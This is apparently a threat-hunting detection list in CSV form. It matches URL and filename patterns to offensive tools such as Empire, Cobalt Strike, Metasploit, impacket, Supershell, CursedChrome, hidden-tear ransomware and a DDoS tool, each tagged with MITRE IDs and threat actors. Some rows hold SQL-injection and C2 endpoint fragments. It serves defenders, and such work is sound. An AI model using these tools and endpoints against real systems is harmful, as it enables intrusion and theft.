"*http://localhost:80/bcsjngnk*",".{0,1000}http\:\/\/localhost\:80\/bcsjngnk.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47482"
"*http://localhost:8000/emailviewer.html*",".{0,1000}http\:\/\/localhost\:8000\/emailviewer\.html.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","47483"
"*http://localhost:8118*",".{0,1000}http\:\/\/localhost\:8118.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","privproxy port also web panel for victims","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","47484"
"*http://localhost:9090/*",".{0,1000}http\:\/\/localhost\:9090\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47485"
"*http://localhost:9999/portal*",".{0,1000}http\:\/\/localhost\:9999\/portal.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","1","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","47486"
"*http://louis-ddosvn.rhcloud.com/f5.html?v=*",".{0,1000}http\:\/\/louis\-ddosvn\.rhcloud\.com\/f5\.html\?v\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47488"
"*http://md5.80p.cn*",".{0,1000}http\:\/\/md5\.80p\.cn.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47489"
"*http://md5.gongjuji.net*",".{0,1000}http\:\/\/md5\.gongjuji\.net.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47490"
"*http://md5.gromweb.com*",".{0,1000}http\:\/\/md5\.gromweb\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47491"
"*http://md5.my-addr.com*",".{0,1000}http\:\/\/md5\.my\-addr\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47492"
"*http://md5.tellyou.top*",".{0,1000}http\:\/\/md5\.tellyou\.top.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47493"
"*http://mirror.archlinux.no*",".{0,1000}http\:\/\/mirror\.archlinux\.no.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","47494"
"*http://nemesis/file*",".{0,1000}http\:\/\/nemesis\/file.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47495"
"*http://nemesis/yara*",".{0,1000}http\:\/\/nemesis\/yara.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47496"
"*http://nemesis-es-http.default.svc.cluster.local:9200*",".{0,1000}http\:\/\/nemesis\-es\-http\.default\.svc\.cluster\.local\:9200.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47497"
"*http://nemesis-es-internal-http:9200*",".{0,1000}http\:\/\/nemesis\-es\-internal\-http\:9200.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47498"
"*http://nemesis-kb-http.default.svc.cluster.local:5601*",".{0,1000}http\:\/\/nemesis\-kb\-http\.default\.svc\.cluster\.local\:5601.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47499"
"*http://nemesis-kb-http:5601*",".{0,1000}http\:\/\/nemesis\-kb\-http\:5601.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47500"
"*http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B&q=*",".{0,1000}http\:\/\/nova\.rambler\.ru\/search\?btnG\=\%D0\%9D\%\?D0\%B0\%D0\%B\&q\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47501"
"*http://page-xirusteam.rhcloud.com/f5ddos3.html?v=*",".{0,1000}http\:\/\/page\-xirusteam\.rhcloud\.com\/f5ddos3\.html\?v\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47502"
"*http://php-hrdevil.rhcloud.com/f5ddos3.html?v=*",".{0,1000}http\:\/\/php\-hrdevil\.rhcloud\.com\/f5ddos3\.html\?v\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47505"
"*http://rainbowtables.it64.com*",".{0,1000}http\:\/\/rainbowtables\.it64\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47506"
"*http://shell:7681/token*",".{0,1000}http\:\/\/shell\:7681\/token.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","47511"
"*http://sniff.su/*.gz*",".{0,1000}http\:\/\/sniff\.su\/.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47512"
"*http://sniff.su/*.zip*",".{0,1000}http\:\/\/sniff\.su\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47513"
"*http://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download*",".{0,1000}http\:\/\/sourceforge\.net\/projects\/adzok\/files\/Adzok_Open_v1\.0\.0\.2\.jar\/download.{0,1000}","offensive_tool_keyword","Adzok","RAT tool - a variant of Adwind abused by TA","T1219 - T1105 - T1027 - T1059 - T1204","TA0011 - TA0005 - TA0002 - TA0008","N/A","Packrat","Malware","https://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","47514"
"*http://tarantula.by.ru/localroot/*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","47516"
"*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","47517"
"*http://tor2web.*","http\:\/\/tor2web\..{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","47520"
"*http://ttmd5.com*",".{0,1000}http\:\/\/ttmd5\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47521"
"*http://utkusen.com/hidden-tear/*",".{0,1000}http\:\/\/utkusen\.com\/hidden\-tear\/.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47524"
"*http://vpsip:28888*",".{0,1000}http\:\/\/vpsip\:28888.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","47525"
"*http://wfuzz.org*",".{0,1000}http\:\/\/wfuzz\.org.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","47526"
"*http://www.ampliasecurity.com/research/wcefaq.html*",".{0,1000}http\:\/\/www\.ampliasecurity\.com\/research\/wcefaq\.html.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","47528"
"*http://www.chamd5.org/*",".{0,1000}http\:\/\/www\.chamd5\.org\/.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47529"
"*http://www.dmd5.com*",".{0,1000}http\:\/\/www\.dmd5\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47530"
"*http://www.exploit-db.com/exploits/*",".{0,1000}http\:\/\/www\.exploit\-db\.com\/exploits\/.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","1","N/A","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","47533"
"*http://www.gmer.net/#files*",".{0,1000}http\:\/\/www\.gmer\.net\/\#files.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47534"
"*http://www.insecam.org/en/jsoncountries/*",".{0,1000}http\:\/\/www\.insecam\.org\/en\/jsoncountries\/.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","47535"
"*http://www.md5cracker.com*",".{0,1000}http\:\/\/www\.md5cracker\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47536"
"*http://www.nirsoft.net/password_test*",".{0,1000}http\:\/\/www\.nirsoft\.net\/password_test.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47537"
"*http://www.site.com/article.php?id=1*",".{0,1000}http\:\/\/www\.site\.com\/article\.php\?id\=1.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","47540"
"*http://www.site.com/vuln.php?id=1 --dbs*",".{0,1000}http\:\/\/www\.site\.com\/vuln\.php\?id\=1\s\-\-dbs.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","47541"
"*http://www2.gmer.net/download*",".{0,1000}http\:\/\/www2\.gmer\.net\/download.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47542"
"*http://www2.gmer.net/gmer.zip*",".{0,1000}http\:\/\/www2\.gmer\.net\/gmer\.zip.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47543"
"*http://xmd5.com*",".{0,1000}http\:\/\/xmd5\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47544"
"*http_default_pass.txt*",".{0,1000}http_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47546"
"*http_default_users.txt*",".{0,1000}http_default_users\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47547"
"*http_malleable.py*",".{0,1000}http_malleable\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47548"
"*http_ntlmrelay.*",".{0,1000}http_ntlmrelay\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47549"
"*http_owa_common.txt*",".{0,1000}http_owa_common\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47550"
"*http_stager_client_header*",".{0,1000}http_stager_client_header.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47551"
